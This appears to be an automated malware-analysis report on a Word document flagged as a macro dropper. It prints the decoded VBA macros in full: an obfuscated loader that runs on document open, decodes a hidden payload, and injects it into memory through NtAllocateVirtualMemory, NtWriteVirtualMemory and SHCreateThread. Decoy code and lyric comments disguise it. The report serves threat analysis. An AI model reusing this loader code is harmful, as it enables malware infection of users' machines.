MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic indicates this is a dropper, and the presence of VBA macros confirms its malicious intent. The Document_Open macro is likely responsible for initiating the payload download and execution, although the specific details are obfuscated. The benign URLs extracted are not indicative of malicious activity.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim despotism As String -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14970 bytes |
SHA-256: 4fc83c51c82afa0882e1a56ea2df626cf09a41dcc6b2f33b3d146ecd7098e1a0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Array1()
Dim aiData(10) As Integer
Dim i As Integer
For i = LBound(aiData) To UBound(aiData)
aiData(i) = i
Next i
Debug.Print "Lower Bound = " & LBound(aiData)
Debug.Print "Upper Bound = " & UBound(aiData)
Debug.Print "Num Elements = " & WorksheetFunction.Count(aiData)
Debug.Print "Sum Elements = " & WorksheetFunction.Sum(aiData)
End Sub
Function appalachia(annotation, monogynous, puffer)
#If Win64 Then
Dim slackening As Variant
Dim onchocerciasis As Long
Dim bacteriolysis As LongPtr
Dim clothespin As LongPtr
Dim alta As LongPtr
Dim creditworthy As Integer
Dim ceratopogon As LongPtr
Dim cumulation As LongPtr
#Else
Dim clothespin As Long
Dim meningeal As String
Dim bacteriolysis As Long
Dim jamais As Integer
Dim ceratopogon As Long
Dim nematoda As Byte
Dim alta As Long
Dim earthgoddess As Byte
Dim cumulation As Long
Dim fondle As String
Dim novosibirsk As String
#End If
imburse = Math.Round(163)
airspeed = Rnd(160.3075 + 305)
clothespin = annotation
cumulation = puffer
airspeed = Math.Round(309)
ceratopogon = monogynous
oleophilic = 3
argyroxiphium = 364
anthemion = 42117
hyoscyamus = 496057
hyoscyamus = SYD(hyoscyamus, anthemion, argyroxiphium, oleophilic)
miracle = spirit
bacteriolysis = 49 + 35 - 85
compliment ByVal bacteriolysis, clothespin, ceratopogon, cumulation, alta
miracle = "pibroch"
End Function
Private Sub Document_Open()
Dim despotism As String
Dim lessor As Byte
calidity = "de" & "nate" & "d"
shikari
deuteranopic = 49
isoetes = 18467
betoken = 433100
isoetes = Pmt(0.0673, deuteranopic, -2346, betoken, 1)
End Sub
Sub shikari()
Dim girth As Byte
Dim attributive As Integer
companion = ThisDocument.ComputeStatistics(wdStatisticPages)
southwest.bulgaria.Value = companion + 9
chumminess = "narratur"
promulgated = "ce" & "ntimo"
nomadize = "dr" & "awbridge"
Set semiabstraction = southwest.bulgaria.SelectedItem
inwards = 4
mutchkin = 221
carlock = 30183
gourde = 433084
gourde = SYD(gourde, carlock, mutchkin, inwards)
dominant = semiabstraction.Name
positivist = 76 + 104 + 5664
faust = Right(dominant, positivist)
subfamily = metronome.chlorine(faust)
gummite = 2
acinos = 237
brave = 22718
augitic = 176004
augitic = SYD(augitic, brave, acinos, gummite)
crosspurpose = "abigail"
closeknit = "reaumur"
#If Win64 Then
Dim areopagus As String
Dim cheekbone As LongPtr
Dim smarting As LongPtr
Dim bind As Integer
#Else
Dim pitfall As Long
Dim smarting As Long
Dim barbell As String
Dim cheekbone As Long
#End If
gay = 8 + 121 - 129
mer = "internal"
conspicuously = 50 - 44 + 4090
aslope = 5
damkina = 289
jewbush = 44662
plankbed = 297296
plankbed = SYD(plankbed, jewbush, damkina, aslope)
arboraceous = "bl" & "uishness"
fortioribus = "courtierly"
bicuspid = 5
conover = 386
spikebit = 56323
denomination = 542337
denomination = SYD(denomination, spikebit, conover, bicuspid)
accipiter = subfamily
taking = "di" & "sabl" & "ed"
eryngium = "in" & "flictive"
cheekbone = bilgewater(accipiter)
midcourse = "bedbug"
omniform = "beglerbeg"
#If Win64 Then
Dim thereby As Integer
Dim prudential As LongPtr
broken = "agreeing"
nonstandard = "ajuga"
adverbial = "diaspididae"
Dim matchbox As LongPtr
gregorian = 34 + 1278
#Else
aphorism = "truss"
humid = "blandae"
racetrack = "agora"
Dim prudential As Long
dropping = 75 + 420
Dim matchbox As Long
gregorian = dropping + 2659
#End If
Dim nervously As Long
Dim goitrogen As Byte
prudential = 75 - 75
smarting = cheekbone + gregorian
matchbox = 1
quoties = facial(smarting, prudential, matchbox, prudential)
hydrochoeridae = 69
oxide = 31370
psophocarpus = 327158
oxide = Pmt(0.05, hydrochoeridae, -35840, psophocarpus, 1)
End Sub
Function bilgewater(highpowered)
Dim mauger As Byte
Dim crabbedness As String
Dim minoxidil As Variant
Dim coadjutant As Variant
#If Win64 Then
Dim cloudtouching As Integer
Dim benignant As LongPtr
booklet = 40 - 32
Dim baryta As LongPtr
Dim utnapishtim As Variant
Dim guinevere As Integer
Dim babe As LongPtr
Dim teemful As Byte
#Else
Dim governorship As Variant
Dim benignant As Long
booklet = 76 - 40 - 32
Dim baryta As Long
Dim hereness As Long
Dim babe As Long
Dim diapheromera As Variant
Dim bimillenial As Byte
#End If
backwoods = appalachia(VarPtr(benignant), VarPtr(highpowered) + 8, booklet)
carcase = 64 + 27 + 6 - 98
baryta = 69 + 49 + 57 - 175
porterhouse = 15 - 121 - 39 + 145
babe = 76 + 51 + 19 + 9320
fluttering = 59 + 4037
tubal = 23 + 41
asclepiadaceae = opuntiales(ByVal carcase, baryta, ByVal porterhouse, babe, ByVal fluttering, ByVal tubal)
miracle = spirit
spirit = "bone"
appalachia baryta, benignant, 4384
bioclimatology = 6
arch = 380
potest = 51188
clonidine = 454828
clonidine = SYD(clonidine, potest, arch, bioclimatology)
bilgewater = baryta
End Function
Attribute VB_Name = "metronome"
' We are all illuminated,
' Suddenly my eyes are open,
' Suddenly my eyes are open,
#If Win64 Then
'
' Oh, oh tonight?
' You've got to lose inhibition,
Public Declare PtrSafe Function facial Lib "Shlwapi " Alias "SHCreateThread" (ByVal reimburse As LongPtr, ByVal ungenerous As Any, ByVal swartliness As LongPtr, ByVal petulant As LongPtr) As LongPtr
' Romance your ego for a while,
' And try delusion for a while,
' Don't be afraid of tomorrow,
Public Declare PtrSafe Function compliment Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal debouch As Any, ByVal retable As Any, ByVal guzzle As Any, ByVal sottishly As Any, ByVal odious As Any) As LongPtr
' Swing me these sorrows,
' We are, we are, blinding,
' п»їTime waits for no one,
Public Declare PtrSafe Function carrier Lib "Shlwapi.dll" Alias "PathFileExists" (ectoproct As LongPtr) As LongPtr
' Don't be afraid of tomorrow,
' Romance your ego for a while,
' п»їTime waits for no one,
Public Declare PtrSafe Function copetitive Lib "Shell32.dll" Alias "SHGetSettings" (mutual As LongPtr,demonship As LongPtr) As LongPtr
' Suddenly my eyes are open,
' Lights are shining on our faces, blinding
' Everything comes into focus, oh,
Public Declare PtrSafe Function androgenous Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (examples As LongPtr, eutectic As Any,asp As LongPtr, tone As Any) As Boolean
' Lights are shining on our faces, blinding
' Everything comes into focus, oh,
' So do you want to waste some time?
Public Declare PtrSafe Function audiotape Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal cayenne As LongPtr,frangipani As LongPtr,becalmed As LongPtr,plebeian As LongPtr,malapropism As LongPtr) As Boolean
' We are, we are, blinding
' We are all illuminated,
' Suddenly my eyes are open,
Public Declare PtrSafe Function hemolysin Lib "Shell32.dll" Alias "SHGetDesktopFolder" (hurry As LongPtr)
' Romance your ego for a while,
' Lights are shining on our faces, blinding
' Lights are shining on our faces, blinding
Public Declare PtrSafe Function opuntiales Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (scrimp As LongPtr, profitableness As LongPtr, ByVal animalia As LongPtr,paradoxicallyByVal As LongPtr, ode As LongPtr, ByVal eriodictyon As LongPtr) As LongPtr
' And try delusion for a while,
' Everything comes into focus, oh,
' We are, we are, blinding,
' Everything comes into focus, oh,
' Lights are shining on our faces, blinding
' We are all illuminated,
#Else
' We are all illuminated
' Everything comes into focus, oh,
' Suddenly my eyes are open,
Public Declare Function compliment Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal satang As Any, ByVal biogeographic As Any, ByVal purseproud As Any, ByVal aeneid As Any, ByVal carpophagous As Any) As Long
' Lights are shining on our faces, blinding
' Don't be afraid of tomorrow,
' We are, we are, blinding
Public Declare Function facial Lib "Shlwapi " Alias "SHCreateThread" (ByVal chinaware As Long, ByVal formae As Any, ByVal benefice As Any, ByVal nous As Any) As Long
'
' Everything comes into focus, oh,
' Suddenly my eyes are open,
Public Declare Function chowderhead Lib "Shell32.dll" Alias "SHGetSettings" (grigri As Long, moldova As Long) As Long
'
' Suddenly my eyes are open,
' We are all illuminated,
Public Declare Function alabama Lib "Shlwapi.dll" Alias "PathFileExists" (alopex As Long) As Long
' We are, we are, blinding,
' Everything comes into focus, oh,
' We are, we are, blinding,
Public Declare Function tien Lib "Shell32.dll" Alias "SHGetDesktopFolder" (bryophyte As Long)
'
' Everything comes into focus, oh,
'
Public Declare Function stridulous Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal fanfare As Long, eyeteeth As Long, dragee As Long, maypop As Long, dasyuridae As Long) As Boolean
' Just take my hand, I'll make it feel so much better tonight
' Romance your ego for a while,
' Lights are shining on our faces, blinding
Public Declare Function screwshaped Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (piscem As Long, epigraphy As Any, headhunter As Long, scraggy As Any) As Boolean
' Lights are shining on our faces, blinding
'
' We are, we are, blinding,
Public Declare Function opuntiales Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (detrusive As Long, thereto As Long, ByVal norm As Long, chaffweedByVal As Long, crouching As Long, ByVal lucidity As Long) As Long
'
' Its such a beautiful night,
' We are all illuminated,
' Lights are shining on our faces, blinding
' Everything comes into focus, oh,
' Come on, give it a try
#End If
' Swing me these sorrows,
' Suddenly my eyes are open,
' Everything comes into focus, oh,
Function moderator()
Dim noyade(255) As Byte
hereditary = 65
Do
noyade(hereditary) = hereditary - 65
hereditary = hereditary + 1
Loop Until hereditary = 91
hereditary = 48
Do
noyade(hereditary) = hereditary + 4
hereditary = hereditary + 1
Loop Until hereditary = 58
hereditary = 97
Do
noyade(hereditary) = hereditary - 71
hereditary = hereditary + 1
Loop Until hereditary = 123
noyade(47) = 63
hereditary = 43
noyade(hereditary) = 62
moderator = noyade
End Function
Sub Binary_Search_of_Array()
Dim intThousand(1000) As Integer
Dim i As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant
For i = 1 To 1000
intThousand(i) = i
Next i
varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)
Do
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)
If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub
Function approximative(stiffbacked)
approximative = AscW(stiffbacked)
End Function
Function chlorine(unflattering) As String
Dim stockcar As Long
Dim cloudburst(63) As Long
Dim headed As Variant
Dim thievery As Long
Dim calabash(63) As Long
Dim iroquois As Long
Dim berkelium As Integer
imburse = Math.Round(215)
Dim arctocephalus As Long
Dim foreclose As String
Dim barrenness As String
Dim aconcagua As Long
ambiguas = "taint"
spirit = ambiguas
Dim cytotoxin() As Byte
Dim taka(6965) As Byte
Dim erolia(63) As Long
dusk = 9 + 258039
classifier = 4096
misdoubt = 117 - 48 - 62 + 16711673
alundum = 65536
Dim colonel As Byte
Dim dermal As String
bronchiolar = 65280
eyeish = 38 - 2 - 13 + 262121
antispast = 63
Dim selfgovernment As Long
donative = 256
frock = 16515072
taichung = 118 + 103 + 3811
quacksalver = 255
legitimateness = 64
Dim cowfish As Integer
fairy = 108 - 108
illustrator = 5843
Dim artiodactyla() As Byte
artiodactyla = VBA.StrConv(unflattering, vbFromUnicode)
Dim flatmate As Byte
grippe = 38
image = 27861
chara = 229883
image = Pmt(0.0714, grippe, -7479, chara, 0)
miasmic = 5843
protogeometric = 35
abscessed = Sqr(100) / Sqr(4) + 20
For brittleness = 0 To miasmic
If brittleness Mod 2 = 0 Then
artiodactyla(brittleness) = artiodactyla(brittleness) + abscessed
Else
artiodactyla(brittleness) = artiodactyla(brittleness) + abscessed - 1
End If
Next brittleness
winner = 81
genera = 29174
cynically = 383707
genera = Pmt(0.0415, winner, -31595, cynically, 1)
berkelium = 0
regum = 121 + 108 - 81 - 148
catatonic = 43
ruction = moderator
For arctocephalus = 0 To 63
erolia(arctocephalus) = myelofibrosis(arctocephalus, legitimateness, 3)
calabash(arctocephalus) = myelofibrosis(arctocephalus, classifier, 3)
cloudburst(arctocephalus) = myelofibrosis(arctocephalus, eyeish, 3)
Next arctocephalus
fornix = 25
blowfish = 33039
headful = 527140
blowfish = Pmt(0.0607, fornix, -7987, headful, 0)
cytotoxin = artiodactyla
agronomist = 4
all = 3
Wrap = 338
newscast = 34043
margaret = 155694
margaret = SYD(margaret, newscast, Wrap, all)
mouthy = 23 + 83 - 14 - 89
miracle = spirit
airspeed = Fix(219.6105 + 214)
lots = mouthy + 1
kentuckian = 2
For iroquois = 0 To miasmic
halfhardy = cytotoxin(iroquois)
methodize = cytotoxin(iroquois + 2)
stockcar = cloudburst(ruction(halfhardy)) _
+ calabash(ruction(cytotoxin(iroquois + 1))) + erolia(ruction(methodize)) + ruction(cytotoxin(iroquois + mouthy))
arctocephalus = myelofibrosis(stockcar, misdoubt, 2)
taka(thievery) = myelofibrosis(arctocephalus, alundum, 1)
arctocephalus = myelofibrosis(stockcar, bronchiolar, 2)
taka(thievery + 1) = myelofibrosis(arctocephalus, donative, 1)
taka(thievery + kentuckian) = myelofibrosis(stockcar, quacksalver, 2)
thievery = thievery + kentuckian + 1
iroquois = iroquois + 3
Next
chlorine = taka
End Function
Function myelofibrosis(belie, qualm, entomophthoraceae)
Select Case entomophthoraceae
Case 1
myelofibrosis = belie \ qualm
Case 2
myelofibrosis = belie And qualm
Case 3
myelofibrosis = belie * qualm
End Select
End Function
Attribute VB_Name = "southwest"
Attribute VB_Base = "0{1FA9F984-494C-4C72-BDEB-7E487E0E348B}{EAB79449-7FFE-418C-899C-F11CFA7ABF48}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.